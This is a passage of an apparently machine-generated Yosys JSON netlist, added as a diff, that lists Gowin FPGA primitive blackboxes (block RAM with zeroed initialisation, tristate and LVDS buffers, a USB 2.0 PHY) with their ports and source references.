"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC", + "WRITE_MODE": "00" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "DI": { + "direction": "input", + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 74, 75, 76 ] + }, + "AD": { + "direction": "input", + "bits": [ 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ] + }, + "WRE": { + "direction": "input", + "bits": [ 91 ] + }, + "CLK": { + "direction": "input", + "bits": [ 92 ] + }, + "CE": { + "direction": "input", + "bits": [ 93 ] + }, + "OCE": { + "direction": "input", + "bits": [ 94 ] + }, + "RESET": { + "direction": "input", + "bits": [ 95 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1427.14-1427.16" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 74, 75, 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1426.13-1426.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 93 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1430.7-1430.9" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 92 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1429.7-1429.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1425.14-1425.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1424.15-1424.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 94 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1431.7-1431.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 95 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1432.7-1432.12" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 91 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1428.7-1428.10" + } + } + } + }, + "TBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:571.1-575.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + }, + "OEN": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:572.9-572.10" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:573.10-573.11" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:572.12-572.15" + } + } + } + }, + "TLVDS_IBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1406.1-1409.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + }, + "IB": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1408.8-1408.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1408.11-1408.13" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1407.8-1407.9" + } + } + } + }, + "TLVDS_IOBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1416.1-1420.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "IO": { + "direction": "inout", + "bits": [ 3 ] + }, + "IOB": { + "direction": "inout", + "bits": [ 4 ] + }, + "I": { + "direction": "input", + "bits": [ 5 ] + }, + "OEN": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1419.7-1419.8" + } + }, + "IO": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1418.7-1418.9" + } + }, + "IOB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1418.11-1418.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1417.10-1417.11" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1419.10-1419.13" + } + } + } + }, + "TLVDS_OBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:593.1-599.10" + }, + "ports": { + "I": { + "direction": "input", + "bits": [ 2 ] + }, + "O": { + "direction": "output", + "bits": [ 3 ] + }, + "OB": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:594.9-594.10" + } + }, + "O": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:595.10-595.11" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:596.10-596.12" + } + } + } + }, + "TLVDS_TBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1411.1-1414.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "OB": { + "direction": "output", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "OEN": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1413.8-1413.9" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1412.8-1412.9" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1412.11-1412.13" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1413.11-1413.14" + } + } + } + }, + "USB20_PHY": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1604.1-1679.10" + }, + "parameter_default_values": { + "ADP_PRBEN": "0", + "C": "01", + "CLK_SEL": "0", + "DATABUS16_8": "0", + "FOC_LOCK": "0", + "HSDRV0": "0", + "HSDRV1": "0", + "M": "0000", + "N": "101000", + "TEST_MODE": "00000" + }, + "ports": { + "DATAIN": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 ] + }, + "TXVLD": { + "direction": "input", + "bits": [ 18 ] + }, + "TXVLDH": { + "direction": "input", + "bits": [ 19 ] + }, + "RESET": { + "direction": "input", + "bits": [ 20 ] + }, + "SUSPENDM": { + "direction": "input", + "bits": [ 21 ] + }, + "XCVRSEL": { + "direction": "input", + "bits": [ 22, 23 ] + }, + "TERMSEL": { + "direction": "input", + "bits": [ 24 ] + }, + "OPMODE": { + "direction": "input", + "bits": [ 25, 26 ] + }, + "DATAOUT": { + "direction": "output", + "bits": [ 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42 ] + }, + "TXREADY": { + "direction": "output", + "bits": [ 43 ] + }, + "RXACTIVE": { + "direction": "output", + "bits": [ 44 ] + }, + "RXVLD": { + "direction": "output", + "bits": [ 45 ] + }, + "RXVLDH": { + "direction": "output", + "bits": [ 46 ] + }, + "CLK": { + "direction": "output", + "bits": [ 47 ] + }, + "RXERROR": { + "direction": "output", + "bits": [ 48 ] + }, + "DP": { + "direction": "inout", + "bits": [ 49 ] + }, + "DM": { + "direction": "inout", + "bits": [ 50 ] + }, + "LINESTATE": { + "direction": "output", + "bits": [ 51, 52 ] + }, + "IDPULLUP": { + "direction": "input", + "bits": [ 53 ] + }, + "DPPD": { + "direction": "input", + "bits": [ 54 ] + }, + "DMPD": { + "direction": "input", + "bits": [ 55 ] + }, + "CHARGVBUS": { + "direction": "input", + "bits": [ 56 ] + }, + "DISCHARGVBUS": { + "direction": "input", + "bits": [ 57 ] + }, + "TXBITSTUFFEN": { + "direction": "input", + "bits": [ 58 ] + }, + "TXBITSTUFFENH": { + "direction": "input", + "bits": [ 59 ] + }, + "TXENN": { + "direction": "input", + "bits": [ 60 ] + }, + "TXDAT": { + "direction": "input", + "bits": [ 61 ] + }, + "TXSE0": { + "direction": "input", + "bits": [ 62 ] + }, + "FSLSSERIAL": { + "direction": "input", + "bits": [ 63 ] + }, + "HOSTDIS": { + "direction": "output", + "bits": [ 64 ] + }, + "IDDIG": { + "direction": "output", + "bits": [ 65 ] + }, + "ADPPRB": { + "direction": "output", + "bits": [ 66 ] + }, + "ADPSNS": { + "direction": "output", + "bits": [ 67 ] + }, + "SESSVLD": { + "direction": "output", + "bits": [ 68 ] + }, + "VBUSVLD": { + "direction": "output", + "bits": [ 69 ] + }, + "RXDP": { + "direction": "output", + "bits": [ 70 ] + }, + "RXDM": { + "direction": "output", + "bits": [ 71 ] + }, + "RXRCV": { + "direction": "output", + "bits": [ 72 ] + }, + "LBKERR": { + "direction": "output", + "bits": [ 73 ] + }, + "CLKRDY": { + "direction": "output", + "bits": [ 74 ] + }, + "INTCLK": { + "direction": "input", + "bits": [ 75 ] + }, + "ID": { + "direction": "inout", + "bits": [ 76 ] + }, + "VBUS": { + "direction": "inout", + "bits": [ 77 ] + }, + "REXT": { + "direction": "inout", + "bits": [ 78 ] + }, + "XIN": { + "direction": "input", + "bits": [ 79 ] + }, + "XOUT": { + "direction": "inout", + "bits": [ 80 ] + }, + "TEST": { + "direction": "input", + "bits": [ 81 ] + }, + "CLK480PAD": { + "direction": "output", + "bits": [ 82 ] + }, + "SCANCLK": { + "direction": "input", + "bits": [ 83 ] + }, + "SCANEN": { + "direction": "input", + "bits": [ 84 ] + }, + "SCANMODE": { + "direction": "input", + "bits": [ 85 ] + }, + "TRESETN": { + "direction": "input", + "bits": [ 86 ] + }, + "SCANIN1": { + "direction": "input", + "bits": [ 87 ] + }, + "SCANOUT1": { + "direction": "output", + "bits": [ 88 ] + }, + "SCANIN2": { + "direction": "input", + "bits": [ 89 ] + }, + "SCANOUT2": { + "direction": "output", + "bits": [ 90 ] + }, + "SCANIN3": { + "direction": "input", + "bits": [ 91 ] + }, + "SCANOUT3": { + "direction": "output", + "bits": [ 92 ] + }, + "SCANIN4": { + "direction": "input", + "bits": [ 93 ] + }, + "SCANOUT4": { + "direction": "output", + "bits": [ 94 ] + }, + "SCANIN5": { + "direction": "input", + "bits": [ 95 ] + }, + "SCANOUT5": { + "direction": "output", + "bits": [ 96 ] + }, + "SCANIN6": { + "direction": "input", + "bits": [ 97 ] + }, + "SCANOUT6": { + "direction": "output", + "bits": [ 98 ] + } + }, + "cells": { + }, + "netnames": { + "ADPPRB": { + "hide_name": 0, + "bits": [ 66 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1646.9-1646.15" + } + }, + "ADPSNS": { + "hide_name": 0, + "bits": [ 67 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1647.9-1647.15" + } + }, + "CHARGVBUS": { + "hide_name": 0, + "bits": [ 56 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1636.9-1636.18" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 47 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1628.9-1628.12" + } + }, + "CLK480PAD": { + "hide_name": 0, + "bits": [ 82 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1662.8-1662.17" + } + }, + "CLKRDY": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1654.9-1654.15" + } + }, + "DATAIN": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1615.17-1615.23" + } + }, + "DATAOUT": { + "hide_name": 0, + "bits": [ 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1623.17-1623.24" + } + }, + "DISCHARGVBUS": { + "hide_name": 0, + "bits": [ 57 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1637.9-1637.21" + } + }, + "DM": { + "hide_name": 0, + "bits": [ 50 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1631.9-1631.11" + } + }, + "DMPD": { + "hide_name": 0, + "bits": [ 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1635.9-1635.13" + } + }, + "DP": { + "hide_name": 0, + "bits": [ 49 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1630.9-1630.11" + } + }, + "DPPD": { + "hide_name": 0, + "bits": [ 54 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1634.9-1634.13" + } + }, + "FSLSSERIAL": { + "hide_name": 0, + "bits": [ 63 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1643.9-1643.19" + } + }, + "HOSTDIS": { + "hide_name": 0, + "bits": [ 64 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1644.9-1644.16" + } + }, + "ID": { + "hide_name": 0, + "bits": [ 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1656.9-1656.11" + } + }, + "IDDIG": { + "hide_name": 0, + "bits": [ 65 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1645.9-1645.14" + } + }, + "IDPULLUP": { + "hide_name": 0, + "bits": [ 53 ], + "attributes": { + "src": 